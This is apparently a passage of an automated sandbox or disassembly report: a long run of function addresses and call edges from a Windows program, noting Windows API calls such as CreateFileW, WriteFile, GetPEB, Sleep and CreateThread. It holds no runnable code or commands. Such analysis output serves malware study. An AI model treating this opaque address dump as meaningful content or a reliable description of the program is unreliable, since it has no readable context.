425f6e 85771->85776 85812 410200 52 API calls 2 library calls 85772->85812 85773->85771 85775 4101d6 85813 410200 52 API calls 2 library calls 85775->85813 85776->84904 85778 4101e9 85778->84904 85780 40f760 126 API calls 85779->85780 85781 40f584 85780->85781 85782 429335 85781->85782 85783 40f58c 85781->85783 85786 4528bd 118 API calls 85782->85786 85784 40f598 85783->85784 85785 429358 85783->85785 85838 4033c0 113 API calls 7 library calls 85784->85838 85839 434034 86 API calls _wprintf 85785->85839 85788 42934b 85786->85788 85791 429373 85788->85791 85792 42934f 85788->85792 85790 40f5b4 85790->84901 85795 4115d7 52 API calls 85791->85795 85794 431e58 82 API calls 85792->85794 85793 429369 85793->85791 85794->85785 85804 4293c5 ctype 85795->85804 85796 42959c 85797 413748 _free 46 API calls 85796->85797 85798 4295a5 85797->85798 85799 431e58 82 API calls 85798->85799 85800 4295b1 85799->85800 85804->85796 85805 401b10 52 API calls 85804->85805 85814 444af8 85804->85814 85817 44b41c 85804->85817 85824 402780 85804->85824 85832 4022d0 85804->85832 85840 44c7dd 64 API calls 3 library calls 85804->85840 85805->85804 85809 410167 _wcslen 85808->85809 85810 4115d7 52 API calls 85809->85810 85811 41017e _wcscpy 85810->85811 85811->85761 85812->85775 85813->85778 85815 4115d7 52 API calls 85814->85815 85816 444b27 _memmove 85815->85816 85816->85804 85819 44b429 85817->85819 85818 4115d7 52 API calls 85820 44b440 85818->85820 85819->85818 85821 44b45e 85820->85821 85822 401b10 52 API calls 85820->85822 85821->85804 85823 44b453 85822->85823 85823->85804 85825 402827 85824->85825 85831 402790 ctype _memmove 85824->85831 85827 4115d7 52 API calls 85825->85827 85826 4115d7 52 API calls 85828 402797 85826->85828 85827->85831 85829 4115d7 52 API calls 85828->85829 85830 4027bd 85828->85830 85829->85830 85830->85804 85831->85826 85833 40239d 85832->85833 85834 4022e0 85832->85834 85833->85804 85834->85833 85835 4115d7 52 API calls 85834->85835 85836 402320 ctype 85834->85836 85835->85836 85836->85833 85837 4115d7 52 API calls 85836->85837 85837->85836 85838->85790 85839->85793 85840->85804 85842 402417 85841->85842 85846 402539 ctype 85841->85846 85843 4115d7 52 API calls 85842->85843 85842->85846 85844 402443 85843->85844 85845 4115d7 52 API calls 85844->85845 85847 4024b4 85845->85847 85846->84908 85847->85846 85847->85847 85849 4022d0 52 API calls 85847->85849 85870 402880 95 API calls 2 library calls 85847->85870 85849->85847 85853 401566 85850->85853 85851 401794 85871 40e9a0 90 API calls 85851->85871 85853->85851 85855 40167a 85853->85855 85856 4010a0 52 API calls 85853->85856 85857 4017c0 85855->85857 85872 45e737 90 API calls 3 library calls 85855->85872 85856->85853 85857->84911 85859 40bc70 52 API calls 85858->85859 85868 40d451 85859->85868 85860 40d50f 85875 410600 52 API calls 85860->85875 85862 427c01 85876 45e737 90 API calls 3 library calls 85862->85876 85863 40e0a0 52 API calls 85863->85868 85865 40d519 85865->84913 85866 401b10 52 API calls 85866->85868 85868->85860 85868->85862 85868->85863 85868->85865 85868->85866 85873 40f310 53 API calls 85868->85873 85874 40d860 91 API calls 85868->85874 85870->85847 85871->85855 85872->85857 85873->85868 85874->85868 85875->85865 85876->85865 85877->84926 85878->84927 85880 4091c6 85879->85880 85881 42c5fe 85879->85881 85880->84989 85881->85880 85882 40bc70 52 API calls 85881->85882 85883 42c64e InterlockedIncrement 85882->85883 85884 42c665 85883->85884 85890 42c697 85883->85890 85886 42c672 InterlockedDecrement Sleep InterlockedIncrement 85884->85886 85884->85890 85885 42c737 InterlockedDecrement 85887 42c74a 85885->85887 85886->85884 85886->85890 85889 408f40 VariantClear 85887->85889 85888 42c731 85888->85885 85891 42c752 85889->85891 85890->85885 85890->85888 86163 408e80 85890->86163 86172 410c60 VariantClear ctype 85891->86172 85896 42c6db 85897 402160 52 API calls 85896->85897 85898 42c6e5 85897->85898 86168 45340c 85 API calls 85898->86168 85900 42c6f1 86169 40d200 52 API calls 2 library calls 85900->86169 85902 42c6fb 86170 465124 53 API calls 85902->86170 85904 42c715 85905 42c76a 85904->85905 85906 42c719 85904->85906 85907 401b10 52 API calls 85905->85907 86171 46fe32 VariantClear 85906->86171 85909 42c77e 85907->85909 85910 401980 53 API calls 85909->85910 85916 42c796 85910->85916 85911 42c812 86174 46fe32 VariantClear 85911->86174 85913 42c82a InterlockedDecrement 86175 46ff07 54 API calls 85913->86175 85915 42c864 86176 45e737 90 API calls 3 library calls 85915->86176 85916->85911 85916->85915 86173 40ba10 52 API calls 2 library calls 85916->86173 85917 42c9ec 86219 47d33e 331 API calls 85917->86219 85921 42c9fe 86220 46feb1 VariantClear VariantClear 85921->86220 85923 408f40 VariantClear 85933 42c849 85923->85933 85924 42ca08 85925 401b10 52 API calls 85924->85925 85927 42ca15 85925->85927 85926 408f40 VariantClear 85928 42c891 85926->85928 85930 40c2c0 52 API calls 85927->85930 86177 410c60 VariantClear ctype 85928->86177 85929 401980 53 API calls 85929->85933 85934 42c874 85930->85934 85932 402780 52 API calls 85932->85933 85933->85917 85933->85923 85933->85929 85933->85932 86178 40a780 85933->86178 85934->85926 85936 42ca59 85934->85936 85936->85936 85938 40afc4 85937->85938 85939 40b156 85937->85939 85940 40afd5 85938->85940 85941 42d1e3 85938->85941 86230 45e737 90 API calls 3 library calls 85939->86230 85945 40a780 194 API calls 85940->85945 85962 40b11a ctype 85940->85962 86231 45e737 90 API calls 3 library calls 85941->86231 85944 42d1f8 85950 408f40 VariantClear 85944->85950 85948 40b00a 85945->85948 85946 40b143 85946->84989 85948->85944 85951 40b012 85948->85951 85949 42d4db 85949->85949 85950->85946 85952 40b04a 85951->85952 85953 40b094 ctype 85951->85953 85955 42d231 VariantClear 85951->85955 85960 40b05c ctype 85952->85960 86232 40e270 VariantClear ctype 85952->86232 85954 40b108 85953->85954 85958 42d425 ctype 85953->85958 85954->85962 86233 40e270 VariantClear ctype 85954->86233 85955->85960 85956 42d45a VariantClear 85956->85962 85958->85956 85958->85962 85959 4115d7 52 API calls 85959->85953 85960->85953 85960->85959 85962->85946 86234 45e737 90 API calls 3 library calls 85962->86234 85964 408fff 85963->85964 85974 40900d 85963->85974 86235 403ea0 52 API calls __cinit 85964->86235 85967 42c3f6 86238 45e737 90 API calls 3 library calls 85967->86238 85969 40a780 194 API calls 85969->85974 85970 42c44a 86240 45e737 90 API calls 3 library calls 85970->86240 85972 42c47b 86241 451b42 61 API calls 85972->86241 85974->85967 85974->85969 85974->85970 85974->85972 85975 42c4cb 85974->85975 85976 42c564 85974->85976 85979 42c548 85974->85979 85983 409112 85974->85983 85985 42c528 85974->85985 85987 4090df 85974->85987 85991 4090ea 85974->85991 85993 4090f2 ctype 85974->85993 86237 4534e3 52 API calls 85974->86237 86239 40c4e0 194 API calls 85974->86239 86243 47faae 233 API calls 85975->86243 85980 408f40 VariantClear 85976->85980 86246 45e737 90 API calls 3 library calls 85979->86246 85980->85993 85981 42c491 85981->85993 86242 45e737 90 API calls 3 library calls 85981->86242 85982 42c4da 85982->85993 86244 45e737 90 API calls 3 library calls 85982->86244 85983->85979 85989 40912b 85983->85989 86245 45e737 90 API calls 3 library calls 85985->86245 85987->85991 85992 408e80 VariantClear 85987->85992 85989->85993 86236 403e10 53 API calls 85989->86236 85994 408f40 VariantClear 85991->85994 85992->85991 85993->84989 85994->85993 85996 40914b 85997 408f40 VariantClear 85996->85997 85997->85993 86247 408d90 85998->86247 86000 429778 86276 410c60 VariantClear ctype 86000->86276 86002 429780 86003 408cf9 86003->86000 86004 42976c 86003->86004 86006 408d2d 86003->86006 86275 45e737 90 API calls 3 library calls 86004->86275 86263 403d10 86006->86263 86009 408d71 ctype 86009->84989 86010 408f40 VariantClear 86011 408d45 ctype 86010->86011 86011->86009 86011->86010 86013 4096c6 _wcslen 86012->86013 86014 4115d7 52 API calls 86013->86014 86074 40a70c ctype _memmove 86013->86074 86015 4096fa _memmove 86014->86015 86016 4115d7 52 API calls 86015->86016 86018 40971b 86016->86018 86017 4013a0 52 API calls 86019 4297aa 86017->86019 86021 409749 CharUpperBuffW 86018->86021 86024 40976a ctype 86018->86024 86018->86074 86020 4115d7 52 API calls 86019->86020 86063 4297d1 _memmove 86020->86063 86021->86024 86070 4097e5 ctype 86024->86070 86578 47dcbb 196 API calls 86024->86578 86025 408f40 VariantClear 86026 42ae92 86025->86026 86605 410c60 VariantClear ctype 86026->86605 86028 42aea4 86029 409aa2 86031 4115d7 52 API calls 86029->86031 86035 409afe 86029->86035 86029->86063 86030 40a689 86032 4115d7 52 API calls 86030->86032 86031->86035 86054 40a6af ctype _memmove 86032->86054 86033 409b2a 86037 429dbe 86033->86037 86105 409b4d ctype _memmove 86033->86105 86586 40b400 VariantClear VariantClear ctype 86033->86586 86034 40c2c0 52 API calls 86034->86070 86035->86033 86036 4115d7 52 API calls 86035->86036 86038 429d31 86036->86038 86041 429dd3 86037->86041 86587 40b400 VariantClear VariantClear ctype 86037->86587 86040 429d42 86038->86040 86583 44a801 52 API calls 86038->86583 86052 40e0a0 52 API calls 86040->86052 86041->86105 86588 40e1c0 VariantClear ctype 86041->86588 86042 429a46 VariantClear 86042->86070 86043 409fd2 86045 40a045 86043->86045 86098 42a3f5 86043->86098 86049 4115d7 52 API calls 86045->86049 86046 408f40 VariantClear 86046->86070 86055 40a04c 86049->86055 86051 4115d7 52 API calls 86051->86070 86056 429d57 86052->86056 86060 4115d7 52 API calls 86054->86060 86061 40a0a7 86055->86061 86065 4091e0 317 API calls 86055->86065 86584 453443 52 API calls 86056->86584 86058 42a42f 86592 45e737 90 API calls 3 library calls 86058->86592 86060->86074 86085 40a0af 86061->86085 86593 40c790 VariantClear ctype 86061->86593 86062 4299d9 86066 408f40 VariantClear 86062->86066 86604 45e737 90 API calls 3 library calls 86063->86604 86065->86061 86069 4299e2 86066->86069 86067 429abd 86067->84989 86068 429d88 86585 453443 52 API calls 86068->86585 86580 410c60 VariantClear ctype 86069->86580 86070->86029 86070->86030 86070->86034 86070->86042 86070->86046 86070->86051 86070->86054 86070->86062 86070->86063 86070->86067 86076 40a780 194 API calls 86070->86076 86077 42a452 86070->86077 86579 40c4e0 194 API calls 86070->86579 86581 40ba10 52 API calls 2 library calls 86070->86581 86582 40e270 VariantClear ctype 86070->86582 86074->86017 86076->86070 86077->86025 86079 4115d7 52 API calls 86079->86105 86080 44a801 52 API calls 86080->86105 86082 408f40 VariantClear 86112 40a162 ctype _memmove 86082->86112 86083 41130a 51 API calls __cinit 86083->86105 86084 402780 52 API calls 86084->86105 86086 40a11b 86085->86086 86087 42a4b4 VariantClear 86085->86087 86085->86112 86093 40a12d ctype 86086->86093 86594 40e270 VariantClear ctype 86086->86594 86087->86093 86088 40a780 194 API calls 86088->86105 86089 408e80 VariantClear 86089->86105 86091 401980 53 API calls 86091->86105 86092 4115d7 52 API calls 86092->86112 86093->86092 86093->86112 86095 408e80 VariantClear 86095->86112 86096 42a74d VariantClear 86096->86112 86097 40a368 86099 42aad4 86097->86099 86107 40a397 86097->86107 86591 47390f VariantClear 86098->86591 86597 46fe90 VariantClear VariantClear ctype 86099->86597 86100 42a886 VariantClear 86100->86112 86101 42a7e4 VariantClear 86101->86112 86102 40a3ce 86116 40a3d9 ctype 86102->86116 86598 40b400 VariantClear VariantClear ctype 86102->86598 86104 409c95 86104->84989 86105->86043 86105->86058 86105->86074 86105->86079 86105->86080 86105->86083 86105->86084 86105->86088 86105->86089 86105->86091 86105->86098 86105->86104 86589 45f508 52 API calls 86105->86589 86590 403e10 53 API calls 86105->86590 86106 40e270 VariantClear 86106->86112 86107->86102 86132 40a42c ctype 86107->86132 86577 40b400 VariantClear VariantClear ctype 86107->86577 86110 42abaf 86114 42abd4 VariantClear 86110->86114 86123 40a4ee ctype 86110->86123 86111 4115d7 52 API calls 86115 42a5a6 VariantInit VariantCopy 86111->86115 86112->86082 86112->86095 86112->86096 86112->86097 86112->86099 86112->86100 86112->86101 86112->86106 86112->86111 86119 4115d7 52 API calls 86112->86119 86595 470870 52 API calls 86112->86595 86596 44ccf1 VariantClear ctype 86112->86596 86113 40a4dc 86113->86123 86600 40e270 VariantClear ctype 86113->86600 86114->86123 86115->86112 86118 42a5c6 VariantClear 86115->86118 86117 40a41a 86116->86117 86125 42ab44 VariantClear 86116->86125 86116->86132 86117->86132 86599 40e270 VariantClear ctype 86117->86599 86118->86112 86119->86112 86120 42ac4f 86126 42ac79 VariantClear 86120->86126 86130 40a546 ctype 86120->86130 86123->86120 86124 40a534 86123->86124 86124->86130 86601 40e270 VariantClear ctype 86124->86601 86125->86132 86126->86130 86127 42ad28 86133 42ad4e VariantClear 86127->86133 86138 40a583 ctype 86127->86138 86130->86127 86131 40a571 86130->86131 86131->86138 86602 40e270 VariantClear ctype 86131->86602 86132->86110 86132->86113 86133->86138 86135 40a650 ctype 86135->84989 86136 42ae0e VariantClear 86136->86138 86138->86135 86138->86136 86603 40e270 VariantClear ctype 86138->86603 86139->84989 86140->84989 86141->84989 86142->84937 86143->84943 86144->84989 86145->84989 86146->84989 86147->84989 86148->84990 86149->84990 86150->84990 86151->84990 86152->84990 86153->84990 86154->84990 86156 403cdf 86155->86156 86157 408f40 VariantClear 86156->86157 86158 403ce7 86157->86158 86158->84981 86159->84990 86160->84990 86161->84989 86162->84934 86164 408e94 86163->86164 86165 408e88 86163->86165 86167 45340c 85 API calls 86164->86167 86166 408f40 VariantClear 86165->86166 86166->86164 86167->85896 86168->85900 86169->85902 86170->85904 86171->85888 86172->85880 86173->85916 86174->85913 86175->85933 86176->85934 86177->85880 86179 40a7a6 86178->86179 86180 40ae8c 86178->86180 86182 4115d7 52 API calls 86179->86182 86221 41130a 51 API calls __cinit 86180->86221 86215 40a7c6 ctype _memmove 86182->86215 86183 40a86d 86184 40abd1 86183->86184 86200 40a878 ctype 86183->86200 86226 45e737 90 API calls 3 library calls 86184->86226 86186 401b10 52 API calls 86186->86215 86187 42b791 VariantClear 86187->86215 86188 40b5f0 89 API calls 86188->86215 86189 408e80 VariantClear 86189->86215 86190 4115d7 52 API calls 86190->86215 86191 42ba2d VariantClear 86191->86215 86192 408f40 VariantClear 86192->86200 86193 42b459 VariantClear 86193->86215 86194 40a884 ctype 86194->85933 86196 40bc10 53 API calls 86196->86215 86197 408cc0 187 API calls 86197->86215 86198 42b6f6 VariantClear 86198->86215 86199 42bc5b 86199->85933 86200->86192 86200->86194 86201 40e270 VariantClear 86201->86215 86202 42bbf5 86227 45e737 90 API calls 3 library calls 86202->86227 86203 42bb6a 86229 44b92d VariantClear 86203->86229 86204 4115d7 52 API calls 86206 42b5b3 VariantInit VariantCopy 86204->86206 86209 42b5d7 VariantClear 86206->86209 86206->86215 86208 408f40 VariantClear 86208->86215 86209->86215 86212 42bc37 86228 45e737 90 API calls 3 library calls 86212->86228 86215->86183 86215->86184 86215->86186 86215->86187 86215->86188 86215->86189 86215->86190 86215->86191 86215->86193 86215->86196 86215->86197 86215->86198 86215->86201 86215->86202 86215->86203 86215->86204 86215->86208 86215->86212 86218 4530c9 VariantClear 86215->86218 86222 45308a 53 API calls 86215->86222 86223 470870 52 API calls 86215->86223 86224 457f66 87 API calls __write_nolock 86215->86224 86225 472f47 127 API calls 86215->86225 86216 42bc48 86216->86203 86217 408f40 VariantClear 86216->86217 86217->86203 86218->86215 86219->85921 86220->85924 86221->86215 86222->86215 86223->86215 86224->86215 86225->86215 86226->86203 86227->86203 86228->86216 86229->86199 86230->85941 86231->85944 86232->85960 86233->85962 86234->85949 86235->85974 86236->85996 86237->85974 86238->85993 86239->85974 86240->85993 86241->85981 86242->85993 86243->85982 86244->85993 86245->85993 86246->85976 86248 4289d2 86247->86248 86249 408db3 86247->86249 86279 45e737 90 API calls 3 library calls 86248->86279 86277 40bec0 90 API calls 86249->86277 86252 4289e5 86280 45e737 90 API calls 3 library calls 86252->86280 86255 428a05 86257 408f40 VariantClear 86255->86257 86256 408dc9 86256->86252 86256->86255 86258 40a780 194 API calls 86256->86258 86259 408e5a 86256->86259 86260 408e64 86256->86260 86262 408f40 VariantClear 86256->86262 86278 40ba10 52 API calls 2 library calls 86256->86278 86257->86259 86258->86256 86259->86003 86261 408f40 VariantClear 86260->86261 86261->86259 86262->86256 86264 408f40 VariantClear 86263->86264 86265 403d20 86264->86265 86266 403cd0 VariantClear 86265->86266 86267 403d4d 86266->86267 86270 4013c0 52 API calls 86267->86270 86281 467897 86267->86281 86325 40de10 86267->86325 86330 4755ad 86267->86330 86333 45e17d 86267->86333 86343 46e91c 86267->86343 86268 403d76 86268->86000 86268->86011 86270->86268 86275->86000 86276->86002 86277->86256 86278->86256 86279->86252 86280->86255 86282 4678bb 86281->86282 86283 467954 86282->86283 86362 45340c 85 API calls 86282->86362 86284 4115d7 52 API calls 86283->86284 86315 467964 86283->86315 86285 467989 86284->86285 86287 467995 86285->86287 86366 40da60 53 API calls 86285->86366 86346 4533eb 86287->86346 86288 4678f6 86290 413a0e __wsplitpath 46 API calls 86288->86290 86292 4678fc 86290->86292 86294 401b10 52 API calls 86292->86294 86296 46790c 86294->86296 86363 40d200 52 API calls 2 library calls 86296->86363 86299 4679c7 GetLastError 86301 403cd0 VariantClear 86299->86301 86300 467a05 86304 467a2c 86300->86304 86305 467a4b 86300->86305 86306 4679dc 86301->86306 86302 467917 86302->86283 86364 4339fa GetFileAttributesW FindFirstFileW FindClose 86302->86364 86310 4115d7 52 API calls 86304->86310 86307 4115d7 52 API calls 86305->86307 86308 4679e6 86306->86308 86367 44ae3e 86306->86367 86311 467a49 86307->86311 86314 408f40 VariantClear 86308->86314 86309 467928 86309->86283 86313 46792f 86309->86313 86316 467a31 86310->86316 86320 408f40 VariantClear 86311->86320 86365 4335cd 56 API calls 3 library calls 86313->86365 86315->86268 86370 436299 52 API calls 2 library calls 86316->86370 86322 467a88 86320->86322 86321 467939 86321->86283 86323 408f40 VariantClear 86321->86323 86322->86268 86324 467947 86323->86324 86324->86283 86326 4115d7 52 API calls 86325->86326 86327 40de23 86326->86327 86328 40da20 CloseHandle 86327->86328 86329 40de2e 86328->86329 86329->86268 86394 475077 86330->86394 86332 4755c0 86332->86268 86334 45e198 86333->86334 86335 45e19c 86334->86335 86336 45e1b8 86334->86336 86339 408f40 VariantClear 86335->86339 86337 45e1cc 86336->86337 86338 45e1db FindClose 86336->86338 86340 45e1d9 ctype 86337->86340 86342 44ae3e CloseHandle 86337->86342 86338->86340 86341 45e1a4 86339->86341 86340->86268 86341->86268 86342->86340 86495 46e785 86343->86495 86345 46e92f 86345->86268 86347 453404 86346->86347 86348 4533f8 86346->86348 86350 40de40 86347->86350 86348->86347 86371 4531b1 85 API calls 5 library calls 86348->86371 86372 40da20 86350->86372 86352 40de4e 86376 40f110 86352->86376 86355 4264fa 86357 40de84 86385 40e080 SetFilePointerEx SetFilePointerEx 86357->86385 86359 40de8b 86386 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86359->86386 86361 40de90 86361->86299 86361->86300 86362->86288 86363->86302 86364->86309 86365->86321 86366->86287 86368 44ae4b ctype 86367->86368 86388 443fdf 86367->86388 86368->86308 86370->86311 86371->86347 86373 40da37 86372->86373 86374 40da29 86372->86374 86373->86374 86375 40da3c CloseHandle 86373->86375 86374->86352 86375->86352 86377 40f125 CreateFileW 86376->86377 86378 42630c 86376->86378 86380 40de74 86377->86380 86379 426311 CreateFileW 86378->86379 86378->86380 86379->86380 86381 426337 86379->86381 86380->86355 86384 40dea0 55 API calls ctype 86380->86384 86387 40df90 SetFilePointerEx SetFilePointerEx 86381->86387 86383 426342 86383->86380 86384->86357 86385->86359 86386->86361 86387->86383 86395 4533eb 85 API calls 86394->86395 86396 4750b8 86395->86396 86397 4750ee 86396->86397 86398 475129 86396->86398 86399 408f40 VariantClear 86397->86399 86447 4646e0 86398->86447 86407 4750f5 86399->86407 86401 47515e 86402 475162 86401->86402 86434 47518e 86401->86434 86404 408f40 VariantClear 86402->86404 86403 475357 86405 475365 86403->86405 86406 4754ea 86403->86406 86425 475169 86404->86425 86481 44b3ac 57 API calls 86405->86481 86487 464812 92 API calls 86406->86487 86407->86332 86411 4754fc 86412 475374 86411->86412 86413 475508 86411->86413 86460 430d31 86412->86460 86415 408f40 VariantClear 86413->86415 86414 4533eb 85 API calls 86414->86434 86417 47550f 86415->86417 86417->86425 86418 475388 86467 4577e9 86418->86467 86421 47539e 86475 410cfc 86421->86475 86422 475480 86423 408f40 VariantClear 86422->86423 86423->86425 86425->86332 86432 4754b5 86435 408f40 VariantClear 86432->86435 86434->86403 86434->86414 86434->86422 86434->86432 86479 436299 52 API calls 2 library calls 86434->86479 86480 463ad5 64 API calls __wcsicoll 86434->86480 86435->86425 86490 4536f7 53 API calls 86447->86490 86449 4646fc 86491 4426cd 59 API calls _wcslen 86449->86491 86451 464711 86453 40bc70 52 API calls 86451->86453 86459 46474b 86451->86459 86454 46472c 86453->86454 86492 461465 52 API calls _memmove 86454->86492 86456 464793 86456->86401 86457 464741 86458 40c600 52 API calls 86457->86458 86458->86459 86459->86456 86493 463ad5 64 API calls __wcsicoll 86459->86493 86461 430db2 86460->86461 86462 430d54 86460->86462 86461->86418 86463 4115d7 52 API calls 86462->86463 86466 430d74 86463->86466 86464 430da9 86464->86418 86465 4115d7 52 API calls 86465->86466 86466->86464 86466->86465 86468 457a84 86467->86468 86474 45780c _strcat _wcslen _wcscpy ctype 86467->86474 86468->86421 86469 45340c 85 API calls 86469->86474 86470 443006 57 API calls 86470->86474 86472 4135bb 46 API calls _malloc 86472->86474 86473 40f6f0 54 API calls 86473->86474 86474->86468 86474->86469 86474->86470 86474->86472 86474->86473 86494 44b3ac 57 API calls 86474->86494 86476 410d11 86475->86476 86479->86434 86480->86434 86481->86412 86487->86411 86490->86449 86491->86451 86492->86457 86493->86456 86494->86474 86496 46e7a2 86495->86496 86497 4115d7 52 API calls 86496->86497 86500 46e802 86496->86500 86498 46e7ad 86497->86498 86499 46e7b9 86498->86499 86543 40da60 53 API calls 86498->86543 86504 4533eb 85 API calls 86499->86504 86501 46e7e5 86500->86501 86508 46e82f 86500->86508 86502 408f40 VariantClear 86501->86502 86505 46e7ea 86502->86505 86506 46e7ca 86504->86506 86505->86345 86509 40de40 60 API calls 86506->86509 86507 46e8b5 86536 4680ed 86507->86536 86508->86507 86510 46e845 86508->86510 86511 46e7d7 86509->86511 86513 4533eb 85 API calls 86510->86513 86511->86508 86514 46e7db 86511->86514 86523 46e84b 86513->86523 86514->86501 86517 44ae3e CloseHandle 86514->86517 86515 46e8bb 86540 443fbe 86515->86540 86516 46e87a 86544 4689f4 59 API calls 86516->86544 86517->86501 86519 46e883 86522 4013c0 52 API calls 86519->86522 86524 46e88f 86522->86524 86523->86516 86523->86519 86526 40e0a0 52 API calls 86524->86526 86525 408f40 VariantClear 86534 46e881 86525->86534 86527 46e899 86526->86527 86545 40d200 52 API calls 2 library calls 86527->86545 86529 46e911 86529->86345 86530 46e8a5 86546 4689f4 59 API calls 86530->86546 86531 40da20 CloseHandle 86533 46e903 86531->86533 86535 44ae3e CloseHandle 86533->86535 86534->86529 86534->86531 86535->86529 86537 468100 86536->86537 86538 4680fa 86536->86538 86537->86515 86547 467ac4 86538->86547 86570 443e36 86540->86570 86542 443fd3 86542->86525 86542->86534 86543->86499 86544->86534 86545->86530 86546->86534 86548 467bb8 86547->86548 86549 467adc 86547->86549 86548->86537 86550 467c1d 86549->86550 86551 467c16 86549->86551 86552 467b90 86549->86552 86559 467aed 86549->86559 86553 4115d7 52 API calls 86550->86553 86569 40e270 VariantClear ctype 86551->86569 86555 4115d7 52 API calls 86552->86555 86566 467b75 _memmove 86553->86566 86555->86566 86556 467b55 86558 4115d7 52 API calls 86556->86558 86557 4115d7 52 API calls 86557->86548 86560 467b5b 86558->86560 86562 4115d7 52 API calls 86559->86562 86565 467b28 ctype 86559->86565 86567 442ee0 52 API calls 86560->86567 86562->86565 86563 467b6b 86568 45f645 54 API calls ctype 86563->86568 86565->86550 86565->86556 86565->86566 86566->86557 86567->86563 86568->86566 86569->86550 86573 443e19 86570->86573 86574 443e26 86573->86574 86575 443e32 WriteFile 86573->86575 86576 443db4 SetFilePointerEx SetFilePointerEx 86574->86576 86575->86542 86576->86575 86577->86102 86578->86024 86579->86070 86580->86135 86581->86070 86582->86070 86583->86040 86584->86068 86585->86033 86586->86037 86587->86041 86588->86105 86589->86105 86590->86105 86591->86058 86592->86077 86593->86061 86594->86093 86595->86112 86596->86112 86597->86102 86598->86116 86599->86132 86600->86123 86601->86130 86602->86138 86603->86138 86604->86077 86605->86028 86606 42d154 86610 480a8d 86606->86610 86608 42d161 86609 480a8d 194 API calls 86608->86609 86609->86608 86611 480ae4 86610->86611 86612 480b26 86610->86612 86613 480aeb 86611->86613 86614 480b15 86611->86614 86615 40bc70 52 API calls 86612->86615 86616 480aee 86613->86616 86617 480b04 86613->86617 86643 4805bf 194 API calls 86614->86643 86639 480b2e 86615->86639 86616->86612 86619 480af3 86616->86619 86642 47fea2 194 API calls __itow_s 86617->86642 86641 47f135 194 API calls 86619->86641 86621 40e0a0 52 API calls 86621->86639 86624 408f40 VariantClear 86626 481156 86624->86626 86625 480aff 86625->86624 86627 408f40 VariantClear 86626->86627 86628 48115e 86627->86628 86628->86608 86629 480ff5 86649 45e737 90 API calls 3 library calls 86629->86649 86630 40e710 53 API calls 86630->86639 86631 401980 53 API calls 86631->86639 86633 40c2c0 52 API calls 86633->86639 86634 40a780 194 API calls 86634->86639 86635 408e80 VariantClear 86635->86639 86639->86621 86639->86625 86639->86629 86639->86630 86639->86631 86639->86633 86639->86634 86639->86635 86644 45377f 52 API calls 86639->86644 86645 45e951 53 API calls 86639->86645 86646 40e830 53 API calls 86639->86646 86647 47925f 53 API calls 86639->86647 86648 47fcff 194 API calls 86639->86648 86641->86625 86642->86625 86643->86625 86644->86639 86645->86639 86646->86639 86647->86639 86648->86639 86649->86625 86650 4c0f3b8 86667 4c0d008 86650->86667 86652 4c0f47d 86670 4c0f2a8 86652->86670 86669 4c0d693 86667->86669 86673 4c104c8 GetPEB 86667->86673 86669->86652 86671 4c0f2b1 Sleep 86670->86671 86672 4c0f2bf 86671->86672 86673->86669 86674 42b14b 86681 40bc10 86674->86681 86676 42b159 86677 4096a0 331 API calls 86676->86677 86678 42b177 86677->86678 86692 44b92d VariantClear 86678->86692 86680 42bc5b 86682 40bc24 86681->86682 86683 40bc17 86681->86683 86685 40bc2a 86682->86685 86686 40bc3c 86682->86686 86684 408e80 VariantClear 86683->86684 86687 40bc1f 86684->86687 86688 408e80 VariantClear 86685->86688 86689 4115d7 52 API calls 86686->86689 86687->86676 86690 40bc33 86688->86690 86691 40bc43 86689->86691 86690->86676 86691->86676 86692->86680 86693 425b2b 86698 40f000 86693->86698 86697 425b3a 86699 4115d7 52 API calls 86698->86699 86700 40f007 86699->86700 86701 4276ea 86700->86701 86707 40f030 86700->86707 86706 41130a 51 API calls __cinit 86706->86697 86708 40f039 86707->86708 86709 40f01a 86707->86709 86737 41130a 51 API calls __cinit 86708->86737 86711 40e500 86709->86711 86712 40bc70 52 API calls 86711->86712 86713 40e515 GetVersionExW 86712->86713 86714 402160 52 API calls 86713->86714 86715 40e557 86714->86715 86738 40e660 86715->86738 86719 427674 86724 4276c6 GetSystemInfo 86719->86724 86723 40e5cd GetCurrentProcess 86759 40ef20 LoadLibraryA GetProcAddress 86723->86759 86726 4276d5 GetSystemInfo 86724->86726 86727 40e5e0 86727->86726 86752 40efd0 86727->86752 86730 40e629 86756 40ef90 86730->86756 86733 40e641 FreeLibrary 86734 40e644 86733->86734 86735 40e653 FreeLibrary 86734->86735 86736 40e656 86734->86736 86735->86736 86736->86706 86737->86709 86739 40e667 86738->86739 86740 42761d 86739->86740 86741 40c600 52 API calls 86739->86741 86742 40e55c 86741->86742 86743 40e680 86742->86743 86744 40e687 86743->86744 86745 427616 86744->86745 86746 40c600 52 API calls 86744->86746 86747 40e566 86746->86747 86747->86719 86748 40ef60 86747->86748 86749 40e5c8 86748->86749 86750 40ef66 LoadLibraryA 86748->86750 86749->86723 86749->86727 86750->86749 86751 40ef77 GetProcAddress 86750->86751 86751->86749 86753 40e620 86752->86753 86754 40efd6 LoadLibraryA 86752->86754 86753->86724 86753->86730 86754->86753 86755 40efe7 GetProcAddress 86754->86755 86755->86753 86760 40efb0 LoadLibraryA GetProcAddress 86756->86760 86758 40e632 GetNativeSystemInfo 86758->86733 86758->86734 86759->86727 86760->86758 86761 425b5e 86766 40c7f0 86761->86766 86765 425b6d 86801 40db10 52 API calls 86766->86801 86768 40c82a 86802 410ab0 6 API calls 86768->86802 86770 40c86d 86771 40bc70 52 API calls 86770->86771 86772 40c877 86771->86772 86773 40bc70 52 API calls 86772->86773 86774 40c881 86773->86774 86775 40bc70 52 API calls 86774->86775 86776 40c88b 86775->86776 86777 40bc70 52 API calls 86776->86777 86778 40c8d1 86777->86778 86779 40bc70 52 API calls 86778->86779 86780 40c991 86779->86780 86803 40d2c0 52 API calls 86780->86803 86782 40c99b 86804 40d0d0 53 API calls 86782->86804 86784 40c9c1 86785 40bc70 52 API calls 86784->86785 86786 40c9cb 86785->86786 86805 40e310 53 API calls 86786->86805 86788 40ca28 86789 408f40 VariantClear 86788->86789 86790 40ca30 86789->86790 86791 408f40 VariantClear 86790->86791 86792 40ca38 GetStdHandle 86791->86792 86793 429630 86792->86793 86794 40ca87 86792->86794 86793->86794 86795 429639 86793->86795 86800 41130a 51 API calls __cinit 86794->86800 86806 4432c0 57 API calls 86795->86806 86797 429641 86807 44b6ab CreateThread 86797->86807 86799 42964f CloseHandle 86799->86794 86800->86765 86801->86768 86802->86770 86803->86782 86804->86784 86805->86788 86806->86797 86807->86799 86808 44b5cb 58 API calls 86807->86808 86809 425b6f 86814 40dc90 